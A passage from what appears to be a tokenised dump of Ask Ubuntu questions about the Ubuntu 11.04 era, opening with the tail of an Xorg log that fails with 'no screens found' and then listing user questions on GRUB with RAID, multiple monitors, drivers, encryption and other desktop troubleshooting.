[ 333.595 ] bluemasksize : 0 [ 333.595 ] bluefieldposition : 0 [ 333.595 ] rsvdmasksize : 0 [ 333.595 ] rsvdfieldposition : 0 [ 333.595 ] directcolormodeinfo : 0 [ 333.595 ] physbaseptr : 0x0 [ 333.595 ] linbytesperscanline : 0 [ 333.595 ] bnknumberofimagepages : 0 [ 333.595 ] linnumberofimagepages : 0 [ 333.595 ] linredmasksize : 0 [ 333.595 ] linredfieldposition : 0 [ 333.595 ] lingreenmasksize : 0 [ 333.595 ] lingreenfieldposition : 0 [ 333.595 ] linbluemasksize : 0 [ 333.595 ] linbluefieldposition : 0 [ 333.595 ] linrsvdmasksize : 0 [ 333.595 ] linrsvdfieldposition : 0 [ 333.595 ] maxpixelclock : 0 [ 333.598 ] mode : 101 ( 640x480 ) [ 333.598 ] modeattributes : 0x9b [ 333.598 ] winaattributes : 0x7 [ 333.598 ] winbattributes : 0x0 [ 333.598 ] wingranularity : 64 [ 333.598 ] winsize : 64 [ 333.598 ] winasegment : 0xa000 [ 333.598 ] winbsegment : 0x0 [ 333.598 ] winfuncptr : 0xc00081fb [ 333.598 ] bytesperscanline : 640 [ 333.598 ] xresolution : 640 [ 333.598 ] yresolution : 480 [ 333.598 ] xcharsize : 8 [ 333.598 ] ycharsize : 16 [ 333.598 ] numberofplanes : 1 [ 333.598 ] bitsperpixel : 8 [ 333.598 ] numberofbanks : 1 [ 333.598 ] memorymodel : 4 [ 333.598 ] banksize : 0 [ 333.598 ] numberofimages : 24 [ 333.598 ] redmasksize : 0 [ 333.598 ] redfieldposition : 0 [ 333.598 ] greenmasksize : 0 [ 333.598 ] greenfieldposition : 0 [ 333.598 ] bluemasksize : 0 [ 333.598 ] bluefieldposition : 0 [ 333.598 ] rsvdmasksize : 0 [ 333.598 ] rsvdfieldposition : 0 [ 333.598 ] directcolormodeinfo : 0 [ 333.598 ] physbaseptr : 0x7f800000 [ 333.598 ] linbytesperscanline : 640 [ 333.598 ] bnknumberofimagepages : 24 [ 333.598 ] linnumberofimagepages : 24 [ 333.598 ] linredmasksize : 0 [ 333.598 ] linredfieldposition : 0 [ 333.598 ] lingreenmasksize : 0 [ 333.598 ] lingreenfieldposition : 0 [ 333.598 ] linbluemasksize : 0 [ 333.598 ] linbluefieldposition : 0 [ 333.598 ] linrsvdmasksize : 0 [ 333.598 ] linrsvdfieldposition : 0 [ 333.599 ] maxpixelclock : 230000000 [ 333.600 ] mode : 103 ( 0x0 ) [ 333.600 ] modeattributes : 0x0 [ 333.600 ] winaattributes : 0x0 [ 333.600 ] winbattributes : 0x0 [ 333.600 ] wingranularity : 0 [ 333.600 ] winsize : 0 [ 333.600 ] winasegment : 0x0 [ 333.600 ] winbsegment : 0x0 [ 333.600 ] winfuncptr : 0x0 [ 333.600 ] bytesperscanline : 0 [ 333.600 ] xresolution : 0 [ 333.600 ] yresolution : 0 [ 333.600 ] xcharsize : 0 [ 333.600 ] ycharsize : 0 [ 333.600 ] numberofplanes : 0 [ 333.600 ] bitsperpixel : 0 [ 333.600 ] numberofbanks : 0 [ 333.600 ] memorymodel : 0 [ 333.600 ] banksize : 0 [ 333.600 ] numberofimages : 0 [ 333.600 ] redmasksize : 0 [ 333.600 ] redfieldposition : 0 [ 333.600 ] greenmasksize : 0 [ 333.600 ] greenfieldposition : 0 [ 333.600 ] bluemasksize : 0 [ 333.600 ] bluefieldposition : 0 [ 333.600 ] rsvdmasksize : 0 [ 333.600 ] rsvdfieldposition : 0 [ 333.600 ] directcolormodeinfo : 0 [ 333.600 ] physbaseptr : 0x0 [ 333.600 ] linbytesperscanline : 0 [ 333.600 ] bnknumberofimagepages : 0 [ 333.601 ] linnumberofimagepages : 0 [ 333.601 ] linredmasksize : 0 [ 333.601 ] linredfieldposition : 0 [ 333.601 ] lingreenmasksize : 0 [ 333.601 ] lingreenfieldposition : 0 [ 333.601 ] linbluemasksize : 0 [ 333.601 ] linbluefieldposition : 0 [ 333.601 ] linrsvdmasksize : 0 [ 333.601 ] linrsvdfieldposition : 0 [ 333.601 ] maxpixelclock : 0 [ 333.603 ] mode : 111 ( 640x480 ) [ 333.604 ] modeattributes : 0x9b [ 333.604 ] winaattributes : 0x7 [ 333.604 ] winbattributes : 0x0 [ 333.604 ] wingranularity : 64 [ 333.604 ] winsize : 64 [ 333.604 ] winasegment : 0xa000 [ 333.604 ] winbsegment : 0x0 [ 333.604 ] winfuncptr : 0xc00081fb [ 333.604 ] bytesperscanline : 1280 [ 333.604 ] xresolution : 640 [ 333.604 ] yresolution : 480 [ 333.604 ] xcharsize : 8 [ 333.604 ] ycharsize : 16 [ 333.604 ] numberofplanes : 1 [ 333.604 ] bitsperpixel : 16 [ 333.604 ] numberofbanks : 1 [ 333.604 ] memorymodel : 6 [ 333.604 ] banksize : 0 [ 333.604 ] numberofimages : 11 [ 333.604 ] redmasksize : 5 [ 333.604 ] redfieldposition : 11 [ 333.604 ] greenmasksize : 6 [ 333.604 ] greenfieldposition : 5 [ 333.604 ] bluemasksize : 5 [ 333.604 ] bluefieldposition : 0 [ 333.604 ] rsvdmasksize : 0 [ 333.604 ] rsvdfieldposition : 0 [ 333.604 ] directcolormodeinfo : 0 [ 333.604 ] physbaseptr : 0x7f800000 [ 333.604 ] linbytesperscanline : 1280 [ 333.604 ] bnknumberofimagepages : 11 [ 333.604 ] linnumberofimagepages : 11 [ 333.604 ] linredmasksize : 5 [ 333.604 ] linredfieldposition : 11 [ 333.604 ] lingreenmasksize : 6 [ 333.604 ] lingreenfieldposition : 5 [ 333.604 ] linbluemasksize : 5 [ 333.604 ] linbluefieldposition : 0 [ 333.604 ] linrsvdmasksize : 0 [ 333.604 ] linrsvdfieldposition : 0 [ 333.604 ] maxpixelclock : 230000000 [ 333.605 ] [ 333.605 ] ( ii ) vesa ( 0 ) : total memory : 125 64kb banks ( 8000kb ) [ 333.605 ] ( ii ) vesa ( 0 ) : < default monitor > : using hsync range of 31.50-29.43 khz [ 333.605 ] ( ii ) vesa ( 0 ) : < default monitor > : using vrefresh range of 56.00-58.97 hz [ 333.605 ] ( ww ) vesa ( 0 ) : unable to estimate virtual size [ 333.605 ] ( ii ) vesa ( 0 ) : not using built-in mode `` 640x480 '' ( no mode of this name ) [ 333.605 ] ( ww ) vesa ( 0 ) : no valid modes left . trying less strict filter ... [ 333.605 ] ( ii ) vesa ( 0 ) : < default monitor > : using hsync range of 31.50-29.43 khz [ 333.605 ] ( ii ) vesa ( 0 ) : < default monitor > : using vrefresh range of 56.00-58.97 hz [ 333.605 ] ( ww ) vesa ( 0 ) : unable to estimate virtual size [ 333.605 ] ( ii ) vesa ( 0 ) : not using built-in mode `` 640x480 '' ( hsync out of range ) [ 333.605 ] ( ww ) vesa ( 0 ) : no valid modes left . trying aggressive sync range ... [ 333.605 ] ( ii ) vesa ( 0 ) : < default monitor > : using hsync range of 31.50-29.43 khz [ 333.605 ] ( ii ) vesa ( 0 ) : < default monitor > : using vrefresh range of 50.00-58.97 hz [ 333.605 ] ( ww ) vesa ( 0 ) : unable to estimate virtual size [ 333.605 ] ( ii ) vesa ( 0 ) : not using built-in mode `` 640x480 '' ( hsync out of range ) [ 333.605 ] ( ee ) vesa ( 0 ) : no valid modes [ 333.606 ] ( ii ) unloadmodule : `` vesa '' [ 333.606 ] ( ii ) unloading vesa [ 333.606 ] ( ii ) unloadmodule : `` int10 '' [ 333.606 ] ( ii ) unloading int10 [ 333.606 ] ( ii ) unloadmodule : `` vbe '' [ 333.606 ] ( ii ) unloading vbe [ 333.606 ] ( ee ) screen ( s ) found , but none have a usable configuration . [ 333.606 ] fatal server error : [ 333.606 ] no screens found [ 333.606 ] please consult the the x.org foundation support at http : //wiki.x.org for help . [ 333.606 ] please also check the log file at `` /var/log/xorg.0.log '' for additional information . [ 333.606 ] [ 333.625 ] ddxsiggiveup : closing log
45038	dual boot ubuntu 11.04 / vista 32 with a raid 0	i tried to install ubuntu 11.04 several time using all the informations i could gather on the web . but i still fail to install it , and as my vista partition contains very important informations i prefer to ask to people with some experience instead of doing a big mistake . here are my configuration : physical hard-drives : ( hd1 ) hard-drive1 ~300 go ( raid 0 part 1 ) ( hd2 ) hard-drive2 ~300 go ( raid 0 part 2 ) ( hd3 ) hard-drive3 ~640 go ( data 's ) - raid 0 ( hd1 + hd2 ) partitions : vista install ( c : \ ~285 ) development ( d : \ ~225 ) the new empty partition for ubuntu ( 40 go ) - hd3 partitions : my personal data 's ( ~560 go ) the second empty partition for ubuntu ( 40 go ) because i was unable to install it the raid 0 drive . the problem when i install ubuntu all seems ok until the following error : executing 'grub-install /dev/sda ' failed . this is a fatal error . at that time , it offers me 3 options ; select another destination , continue without grub or cancel the installation . when i try to select another destination ( the one that seems to correspond to the ubuntu partition according to gparted ) is does nothing , and if i try to continue without grub ( i could install it later ) a box with the following message appears : we 're sorry ; the installer crashed ... i tried to install it on the raid0 40go partition , and later onto the hd3 40go partition but both of them return the grub error , and in the both cases i ca n't finalize the ubuntu installation even without grub . some informations i use a usb key to boot and install ubuntu ( and it boots without problem ) . the live session of ubuntu start without any problem on the same computer . i was able to install and run the same iso on virtual box on the same computer . the error occurs at almost 80-85 % of the installation . and finally , here are the informations returned by the boot info script after cleaning the both 40go partitions . boot info script 0.60 from 17 may 2011 ============================= boot info summary : =============================== = > syslinux mbr ( 3.61-4.03 ) is installed in the mbr of /dev/sdb . = > windows is installed in the mbr of /dev/sdd . = > hp/gateway is installed in the mbr of /dev/mapper/nvidia_dffbicaa . sdb1 : __________________________________________________________________________ file system : vfat boot sector type : syslinux 4.03 2010-10-22 ... ... .. > ..sr > ... ... ... . : ... 0 ... ~ ... ..~ ... f ... m.f.f ... .f..0~ ... . > e } .u ... ... boot sector info : syslinux looks at sector 32144 of /dev/sdb1 for its second stage . syslinux is installed in the directory . the integrity check of the adv area failed . no errors found in the boot parameter block . operating system : boot files : /syslinux/syslinux.cfg /ldlinux.sys sdd1 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 boot sector info : no errors found in the boot parameter block . operating system : boot files : sdd2 : __________________________________________________________________________ file system : extended partition boot sector type : - boot sector info : nvidia_dffbicaa1 : ______________________________________________________________ file system : ntfs boot sector type : windows vista/7 boot sector info : no errors found in the boot parameter block . operating system : windows vista boot files : /bootmgr /boot/bcd /windows/system32/winload.exe nvidia_dffbicaa2 : ______________________________________________________________ file system : ntfs boot sector type : windows vista/7 boot sector info : no errors found in the boot parameter block . operating system : boot files : /bootmgr /boot/bcd nvidia_dffbicaa3 : ______________________________________________________________ file system : ntfs boot sector type : windows vista/7 boot sector info : no errors found in the boot parameter block . operating system : boot files : ============================ drive/partition info : ============================= drive : sdb _____________________________________________________________________ disk /dev/sdb : 4224 mb , 4224712704 bytes 255 heads , 63 sectors/track , 513 cylinders , total 8251392 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sdb1 * 63 8,251,391 8,251,329 c w95 fat32 ( lba ) drive : sdd _____________________________________________________________________ disk /dev/sdd : 640.1 gb , 640135028736 bytes 255 heads , 63 sectors/track , 77825 cylinders , total 1250263728 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sdd1 2,048 1,168,340,983 1,168,338,936 7 ntfs / exfat / hpfs /dev/sdd2 1,168,340,990 1,250,263,039 81,922,050 5 extended empty partition . drive : nvidia_dffbicaa _____________________________________________________________________ disk /dev/mapper/nvidia_dffbicaa : 600.1 gb , 600138055680 bytes 255 heads , 63 sectors/track , 72962 cylinders , total 1172144640 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/mapper/nvidia_dffbicaa1 * 63 598,870,014 598,869,952 7 ntfs / exfat / hpfs /dev/mapper/nvidia_dffbicaa2 1,151,907,840 1,172,137,983 20,230,144 12 compaq diagnostics /dev/mapper/nvidia_dffbicaa3 598,870,016 1,069,987,823 471,117,808 7 ntfs / exfat / hpfs `` blkid '' output : ________________________________________________________________ device uuid type label /dev/loop0 squashfs /dev/mapper/nvidia_dffbicaa1 f010dab010da7d52 ntfs /dev/mapper/nvidia_dffbicaa2 ca6e68d76e68be37 ntfs respawn recovery /dev/mapper/nvidia_dffbicaa3 34fcd7c1fcd77b94 ntfs /dev/sda nvidia_raid_member /dev/sdb1 0810-0946 vfat pendrive /dev/sdc nvidia_raid_member /dev/sdd1 aa76186576183493 ntfs ========================= `` ls -r /dev/mapper/ '' output : ========================= /dev/mapper : control nvidia_dffbicaa nvidia_dffbicaa1 nvidia_dffbicaa2 nvidia_dffbicaa3 ================================ mount points : ================================= device mount_point type options /dev/loop0 /rofs squashfs ( ro , noatime ) /dev/sdb1 /cdrom vfat ( rw , relatime , fmask=0022 , dmask=0022 , codepage=cp437 , iocharset=iso8859-1 , shortname=mixed , errors=remount-ro ) ========================= sdb1/syslinux/syslinux.cfg : ========================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # d-i config version 2.0 include menu.cfg default vesamenu.c32 prompt 0 timeout 50 # if you would like to use the new menu and be presented with the option to install or run from usb at startup , remove # from the following line . this line was commented out ( by request of many ) to allow the old menu to be presented and to enable booting straight into the live environment ! # ui gfxboot bootlogo -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ================= sdb1 : location of files loaded by syslinux : ================== gib - gb file fragment ( s ) ? ? = ? ? ldlinux.sys 1 ? ? = ? ? syslinux/gfxboot.c32 1 ? ? = ? ? syslinux/syslinux.cfg 1 ? ? = ? ? syslinux/vesamenu.c32 1 ============== sdb1 : version of com32 ( r ) files used by syslinux : =============== syslinux/gfxboot.c32 : com32r module ( v4.xx ) syslinux/vesamenu.c32 : com32r module ( v4.xx ) =============================== stderr messages : =============================== ./boot_info_script.sh : line 1579 : [ : 2.73495e+09 : integer expression expected can any one , give me a hint or explain me why it does n't work ? edit : i removed the second hard drive for the moment , and then i did tried the install using the ubuntu 11.04 alternate iso . the only choice available from the menu is advanced options / rescue broken system . neither run ubuntu from this usb ( probably normal ) nor install ubuntu on a hard disk ( is this normal ? ? ) are available . so i tried rescue broken system , and everything seems ok until the `` detect disks '' step . it is asked the device to use as root file system and the choices are : /dev/dm-1 /dev/dm-2 /dev/dm-3 /dev/dm-4 /dev/dm-5 /dev/sdc1 assemble raid array do not use a root file system i tried with dm-4 and i was able to install grub and to finish the installation . unfortunately , after rebooting , i went to vista without any menu to book on ubuntu . since that when i retry the rescue broken system , and when i select dm-4 as root file system , it offers me to reinstall grub boot loader ( which produce an error ) and to execute shells , but i 'm unable to continue to next step ( partition disks ) does anything seems strange in this ? edit 2 : i finally managed to make grub work by reinstalling it on the /dev/mapper/nvidia_dffbicaa ( known with the command # sudo dmraid -s ) . when i boot on vista it does work without any problem ( pfuuu ) but when i try to book the ubuntu ou the recovery ubuntu , it fails . should i try to reinstall using the normal ubuntu iso ( non alternate ) over this working grub ? edit 3 : ok the problem is solved . here is how a achieved to do it . 1 - cleaning of the 40go partition 2 - boot on ubuntu alternate recovery mode , and use of the main menu ( esc ) to create the partitions ( swap and ext4 ) and assemble the raid , then setup grub using the raid name ( /dev/mapper/theraidname ) instead of /dev/sda . 3 - boot on ubuntu normal , then proceeding to install normally until the grub error ... 4 - reboot and all is there .
45042	force full-screen game to one monitor ?	i have two monitors , one 1920x1200 and the other 1920x1080 , and in 10.10 they were `` separate '' . as in when i opened the display preferences they were shown as separate screens . since installing ( from scratch ) 11.04 i instead have one giant 3840x1200 screen spread over the two monitors . not a problem per se , except when i want to play full-screen games ! when playing games i want them to be on the primary ( 1920x1200 ) monitor , but since the game only detects one screen i cant do that , even if i lower the resolution in-game . i have a nvidia gts 250 card , using nvidia-current driver ( version 270.41.06 ) , even though `` additional drivers '' reports the driver is `` activated but not currently in use '' . is there a way to force the game to use only one of the monitors ? or make the game detect both monitors ?
45043	kate switches to rtl input and i ca n't get back to ltr	this has happened a couple of times ( also to my boss ) - but once in a long while , kate will just switch over to right-to-left input . we 've searched for the menu command or keyboard combination that triggers this so that we can return to left-to-right input , but we 've pretty much had to resort to restarting kate . what is the command for this switchover ?
45044	external monitors do n't go into standby if laptop lid is closed	i use a docking station with 2 external monitors and keep my laptop lid closed when docked . in gnome 's power settings , i have set `` do nothing '' when laptop lid is closed and this works fine ( after adding the option manually through gconf-editor ) . however , when the screens are set to go to standby , they actually just blank , rather than changing their dpms mode . this wastes electricity . if the laptop lid is open , the monitors go to standby as expected . things also work correctly when not logged in ( in gdm ) so i think it must have something to do with gnome . any pointers ?
45049	how to create a kde start application menu launcher that launches the search and launch desktop ?	now i love the plasma-netbook aka the `` search and launch '' interface but i would want to be able to have it appear on demand and not sit as the desktop default in the back of my windows . so what i imagine is having a application launcher be created which on activation brings up the `` search and launch '' feature allowing for easy access of your favorites or have that slick interface to find what your looking for . i 'm aware that krunner solves a similar use-case but search and launch would be more of an unity dash type of search , whereas krunner is more useful when u exactly know what your looking for . and to summarize my question , since i 'm clueless as to how this would be done , i 'm lookinf for someone who could tell me how hard it would be to do it .
45054	evolution has lost all email data after upgrade to 11.04 , is there a way to recover the data ?	evolution seems to have deleted all my emails after an upgrade to natty , is there a way i can recover this data ? is there some mystical folder somewhere that stores this data or should i just forgive and forget ?
45058	issue about pl2303 on ubuntu 8.04	when i send data via /dev/ttyusb0 which is created by the driver pl2303 , it is always sending the data that is last time i wondering send . that meaning : if i type the command as below : echo hello > /dev/ttyusb0 # # the receiver can`t get any infomation echo 1 > /dev/ttyusb0 # # the receiver get `` hello '' echo 123 > /dev/ttyusb0 # # the receiver get `` 1 '' that is quite odd issue ... i have no idea to fix it . btw : my linux kernel version is 2.6.24-26-generic ( ubuntu 8.04 )
45060	how can i get ubuntu to recognize the size of the disk it 's on ?	i was coming dangerously close to filling up a virtualbox disk ( .vdi ) with ubuntu on it . so i enlarged the disk vboxmanage modifyhd your_hard_disk.vdi -- resize size_in_mb i went from a 6gb disk to a 12gb disk . virtualbox recognizes the new disk size . however booting into the ubuntu guest does not . how can i tell ubuntu to take a look at the disk size ? ubuntu 11.04 64bit - host ubuntu 10.04 32bit - guest
45069	when do you think ubuntu one mobile will be available for nexus s ?	i would like to test ubuntu one with my devices . my phone is a samsung nexus s. when it will be available ? thanks , regards
45071	how do i set the refresh rate used by kms on the foss ati driver ?	with kms enabled on xubuntu 11.04 , my virtual terminals are running at 60hz , the default for my monitor , while my x desktop is running at 75 , the refresh rate i specified in my xorg.conf . how do i set the refresh rate/mode used by kms so that it is something different from the default mode provided by my monitor ?
45072	how to control internet access for each program ?	i would like to use a software to control which program may connect to the internet . i know that this behaviour is associated with the word `` firewall '' , but some linux users are very upset if somebody demands a personal firewall . i do n't want to upset you by demand such a program . i do n't want to `` secure ports '' or other stuff a personal firewall promises on windows . i looked into iptables but it does not fit my requirements . i saw an excellent answer here ( `` how to block internet access for wine applications '' ) but it 's very uncomfortable to set this up . is there a software that asks for each program if it may access the internet ?
45075	how do i route my internet through a ssh tunnel ?	old q how do i setup an openvpn server without root privileges ? is there a way to setup an openvpn server without root privileges ? e.g . with configuration files in my home directory ? if yes , how do i set it up ? i 'm trying to ssh into a system and set up an openvpn server over there for personal use . edit since it 's apparent that openvpn needs root privileges , i am changing the question to routing my internet using ssh which i can easily set up .
45078	`` disk driver for / is not ready yet or not present '' error after upgrade	i tried to upgrade my ubuntu 10.10 to 11.04 . after total upgrade , when i reboot my laptop i got following error : init : udevtrigger main process ( 531 ) terminated with status 1 init : udevtrigger post-stop ( 548 ) terminated with status 1 init : udevmonitor main process ( 530 ) killed by term signal the disk drive for / is not ready yet or not present continue to wait ; or press s to skip mounting or m for manual recovery please help . thanks in advance .
45082	enable personal file sharing	hi , i 'm trying to enable personal file sharing , but ubuntu is telling me i need some additional packages . it 's not told me which packages i need or where i can install them . any ideas ?
45083	how do i remove manually installed packages ?	i have followed this tutorial http : //www.openldap.org/doc/admin24/quickstart.html on installing openldap , but now i want to remove it . i 'm not sure which command should i use for that . can somebody point me in right direction ? cheers
45086	how to add an ip alias on a bridged interface ?	i need to add an alias ( 10.0.2.254/24 ) to my bridged interfaces on my ubuntu server . my /etc/network/interfaces is : auto br0 iface br0 inet static address 192.168.200.108 netmask 255.255.0.0 gateway 192.168.200.254 bridge_ports eth0 bridge_stp off bridge_maxwait 0 bridge_fd 0 any ideas ?
45089	how to add a new additional dash and launcher in unity . ( beside of current launcher )	is there any way to add a new launcher or application list like current one ? i mean , i have many installed applications , and i wan na have them all , in 2 panels . please help me how to do that ! -- i 'm using natty .
45099	terminal : open multiple profiles in tabs	i have terminal connections to various systems available from the terminal if i use file- > tab- > ( system name ) . sometimes i want to open a certain set of systems in tabs . is there a command i can use to launch multiple profiles in tabs on the terminal ? that way , each tab can have the different look and using the `` default shell '' setting i can run the command for remote access .
45104	hibernation does not work in 11.04 , used to work in 10.10 , but suspend/resume works fine on a dell inspiron n5010	i upgraded to 11.04 on the day for its release and i am unable to hibernate my laptop , when i click on hibernate , the screen just goes blank and cursor starts blinking in the top left corner and nothing happens . . it used to work fine till 10.10 . suspend/resume works fine though . i am using 11.04 64bit on dell inspiron n5010 it have ati graphics card and i am using propriety drivers for it installed via jockey . thanks
45105	is there a fingerprint reader tool available for ubuntu ?	i 've got a fingerprint reader ( authentek aes2810 ) built in to my laptop ( dell latitude e5500 ) and would like to take a picture of my fingerprint ( not just to use it to log-in or something alike , but to take a viewable picture ) . is there an application for this ?
45108	hide mail icon from top bar	i do n't have a use for the mail icon because this machine does not touch the internet . how can i hide that icon ?
45109	xorg constant high cpu usage	cpu amd athlon ( tm ) 64 x2 dual core processor 4400+ kernel 2.6.38-7.dmz.1-liquorix-amd64 x server version : x.org x server 1.9.0 opengl direct rendering : yes opengl vendor : nvidia corporation opengl renderer : geforce 8400 gs/pci/sse2 opengl version : 3.3.0 nvidia 270.41.06 gcc version : 4.4.5 java version : 1.6.0_20 python version : 2.6.6 gtk version : 2.22.0 pygtk version : 2.21.0 firefox version : mozilla firefox 5.0 ubuntu version : 10.10 gnome version : 2.32.0 the issue is , the xorg process always seems to be active with over 6 % cpu and +50mb ram usage , which in turn keeps the fans blowing all the time .
45112	is it possible to use windows internet connection inside virtual box installaion	suppose i install ubuntu on a virtual box , will i be able to use my windows internet connection , which is connected through a wireless device that ubuntu is unable to detect ?
45114	unable to mount audio disk ( dbus error )	i 'm not able to play audio cds on my lenovo x301 . when i insert them i get this error : dbus error org.freedesktop.dbus.error.noreply : message did not receive a reply ( timeout by message bus ) how do i troubleshoot this ? updates : i have been able to play audio cds before , though the last time i imported new music was over a year ago . dvds both mount and play just fine , but every audio cd i 've tried to insert gives me the same error .
45115	how to install mysql workbench ?	installing mysql workbench on 10.04 or 10.10 is not a problem , as the deb packages are available on mysql 's website . but there is no 11.04 deb package available . so , how do i install mysql workbench on 11.04 and keep it updated automatically when updates become available to ubuntu via apt-get update .
45116	my wireless card is stuck on channel -1 when i 'm trying to use aireplay-ng	i have an intel corporation centrino advanced-n 6200 ( rev 35 ) . i 've put my card into monitor mode , started airodump-ng , etc . even if i set my channel to 6 ( happens to be the one of my access point ) when i go to use aireplay-ng , it stops and says that `` the access point you 're trying to do whatever with is set on channel 6 , but your card is on channel -1 . i 'm not really sure why it 's doing this .
45120	group default.plymouth is broken	if i try to change the plymouth theme i get this error and plymouth is displayed only in text mode : sudo update-alternatives -- config default.plymouth update-alternatives : warning : forcing reinstallation of alternative /lib/plymouth/themes/ubuntu-logo/ubuntu-logo.plymouth because link group default.plymouth is broken . update-alternatives : warning : not replacing /lib/plymouth/themes/default.plymouth with a link . how to fix this ? i am using ubuntu 11.04
45121	how do i tether to a nokia e61 mobile phone ?	i have a nokia e61 mobile phone with 3g internet connection . when i connect it to the computer via usb cable and choose ip pasthrough , this line appears in the list of network connections : wired network ( nokia e61 ( rndis ) ) this option is disabled , i can not choose it . what should i do to allow connection of the computer to the mobile phone as modem ? update : the phone has symbian s60 operating system .
45122	best wifi manager	which is the best wireless lan manager for ubuntu linux ? is wicd the best one available ?
45125	fn key keycode ?	i 'm trying to remap my keyboard such that the caps lock acts as an additional fn key , because the current one is in an awkward place ( over by the home and end ) . i was planning on using xmodmap , which requires keycodes to work . i have my caps lock keycode , which is 66 , but to finish i need the keycode for the fn . using xev and pressing the fn , i do n't see anything . any recommendations ?
45126	postgresql : change default data path	i would like to point the postgresql server to a particular non-default data directory upon startup . right now , i have to ( either manually or in a script ) use pg_ctl to stop and restart the database with my /new/path/to/data . a second related question : is there a place in the ubuntu file system i can start looking when i have questions about what is being run at startup ? thanks
45128	kubuntu 11.04 + windows 7 dual boot laptop drive encryption	i already know how to create a kubuntu/win7 dual boot . what i would like to do is to encrypt both operating systems . i use kubuntu as my main os , and windows 7 for casual gaming or prolonged visual studio programming as gaming is impossible in a vm . i have looked at truecrypt , but it only allows windows system partition encryption . it also does funny things with grub . bitlocker is out of the equation as i can not access my windows files from kubuntu and i only have windows 7 home premium . my planned setup is the following : 500gb hard drive ( dell studio laptop ) ~50gb kubuntu ~100gb windows ~350gb shared media files ( maybe truecrypt normal encrypted partition , unsure on filesystem ) would it be possible to use truecrypt ( and its bootloader for win7 and the shared partition , and somehow chainload grub for kubuntu with encrypted partitions ? i am currently experimenting with a dual-booting virtualbox machine , but no luck so far and it takes a long time to encrypt , despite giving 3 cores and 1536 ram to the vm . any suggestions would be greatly appreciated . thank you ! update : i installed win7 and encrypted it with truecrypt . i also encrypted my shared partition . then i installed kubuntu , installing grub to the /boot partition . now i have an encrypted kubuntu , with access to win7 and shared , but i can not boot into win7 . the truecrypt boot loader appears , asks for password and redirects me to grub . i also tried booting from the truecrypt rescue cd , but with no luck .
45135	where are these unity close , minimize and maximize icons located ?	when i maximize a window in ubuntu 11.04 , the close , minimize and maximize buttons change to these nice ones where are they located on the filesystem ? i would like to build a theme out of them but want the originals .
45136	in unity is there a possibility to add groups and programs to the dash ?	i do n't know how this menu is called but i think you know what i 'm talking about . the one appearing when pressing the super key . by default it shows groups for multimedia , internet , other applications , files and four programs for internet browser , photo application , e-mail and music . is there a possibility to add custom groups like `` office applications '' and other programs .
45139	libreoffice window placement	firstly , this is not a unity question , i 'm a ubuntu 'classic'â˘ user ! what really annoys me is that everytime i open an office document the libre office writer does n't appear on the current workspace , but on the one on the left or right . i really do n't know where this comes from , but it is a really weird behavior as this only happens to libreoffice writer windows , for instance , presentations are not affected . for example : i run 4 workspaces which look like this : + -- -+ -- -+ | 1 | 2 | + -- -+ -- -+ | 3 | 4 | + -- -+ -- -+ if nautilus is on workspace 1 , libreoffice writer opens on workspace 2 and vice versa . if nautilus is on workspace 3 , libreoffice writer opens on workspace 4 and vice versa . i did have a look at the compiz config settings manager , but toggling a few plugins did not help . thanks in advance !
45146	stackapplet faenza icons	stackapplet icons do not match faenza icon set ( system tray icons ) . was wondering if there are any better icons out there . links are welcome . i am also looking for pithos icons ( size 22 for the system tray as well ) . thanks in advance .
45153	is there an alternative to redshift and f.lux which only dims the screen ?	i want one where it reduces the screen 's brightness , either by time or on demand ( i do n't mind ) . i have onboard intel graphics . i do n't want it to be like redshift where it changes the screen 's hue .
45155	uploading video to youtube in right format	i have a sony cx115 and i have a little footage i 'd like to put on youtube . i 've downloaded arista from the ubuntu software center and then i 've downloaded its youtube hd plugin . i 've converted my video and uploaded it to youtube ... the result is a flashy video with a lot of grey in it : http : //www.youtube.com/watch ? v=1v08e5pkvdi what could i do to publish it in high quality so it 'll be viewable ?
45157	how to find name of png file used on a desktop launcher ?	i would like to learn how to determine the name of the .png file used on a desktop launcher . by opening the properties box of a launcher , it is possible to get a lot of info and to change the .png file . i would like to learn how to determine the file name of the .png file used for a launcher , but have been unable to find a way to do it . thanks- tom
45158	how to increase the partition size of ubuntu installed under windows ?	i installed ubuntu 11.04 under windows ( using wubi ) and the default size for the `` partition '' was chosen as 10gb . now it shows frequent issues due to low disk space . how can i increase the size of partition without reinstalling ?
45159	ca n't run desktop python applications when switching out the default python version	i work on google appengine which requires python 2.5 . we all know that python 2.5 is not supported by latest release of ubuntu . ubuntu programs such as software center and gwibber are highly dependent on python 2.7 as i have changed by default version of python to python 2.5 ( i ve created a symbolic link to /usr/bin/python - > /usr/bin/python2.5 ) . every time i get some sort of errors . which includes- software center does not work , update manager does not work , unable to update gwibber ( even from command line . it gives me error that default version of python is not 2.7 ) . however i work on command line so this is not an issue for me but in order to stay updated everytime i need to change symbolic link . is there any other solution for such problem ?
45165	what is the default dictionary ?	what is the default dictionary that provides spell check for programs , like empathy and libreoffice ?
45180	how do i install update the bios of my acer aspire 4820tg laptop ?	the bios update for the acer aspire 4820tg is distributed as a zip file , containing a windows executable and a dos executable . how do i get this installed under ubuntu without resorting to installing windows ? the files i intend to install are located on thispage .
45181	need drivers for matrox g400	i need ubuntu 11.04 drivers for a matrox g400 . i put the video card in and nothing came up on the screen , so i guess there are no drivers of any kind for ubuntu 11.04 . so do i have to load the drivers first using my old card , if so , how do i do it ?
45196	how i priorize program hotkeys ?	i 'm play an game and need the f10 , but when i press it in-game it show the menu context , how i priorize the program hotkeys ? thanks
45199	vmware server console stops responding to clicks	i had installed vmware-server-console just fine . but when yoou open it an as soon as you click in a virtual machine , thats it , the app stop working but not freeze , it just stops recognizing where you click , everywhere you click it puts the cursor inside the vm , you cant switch vms , cant do rigth clic on the left menu , theres not even the toolbar . i try login in with a classic ubuntu session , but this behavior persist . is there a way to fix this .
